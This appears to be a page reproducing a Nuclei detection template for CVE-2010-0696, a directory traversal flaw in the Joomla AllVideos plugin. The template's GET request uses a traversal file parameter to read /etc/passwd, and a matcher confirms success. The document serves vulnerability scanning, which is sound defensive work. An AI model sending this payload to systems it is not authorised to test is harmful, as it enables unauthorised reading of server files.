Skip to content

Joomla! Component Jw_allVideos - Arbitrary File Retrieval

ID: CVE-2010-0696

Severity: medium

Author: daffainfo

Tags: cve2010,cve,joomla,lfi,edb,joomlaworks

A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../…/ (modified dot dot) in the file parameter.

id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
author: daffainfo
severity: medium
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
impact: |
An attacker can exploit this vulnerability to retrieve arbitrary files from the server.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/11447
- https://nvd.nist.gov/vuln/detail/CVE-2010-0696
- http://www.joomlaworks.gr/content/view/77/34/
- http://www.exploit-db.com/exploits/11447
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-0696
cwe-id: CWE-22
epss-score: 0.57303
epss-percentile: 0.97701
cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomlaworks
product: jw_allvideos
tags: cve2010,cve,joomla,lfi,edb,joomlaworks
http:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022030406126a0e1a7040376f3d9fb773741eccfefefe74db53fa4cee7e78ea25ef1022049b1bd9027875ba3273620f037e0e403c7fb39def02147a0b92060ac8bb9549b:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-0696.yaml"

View on Github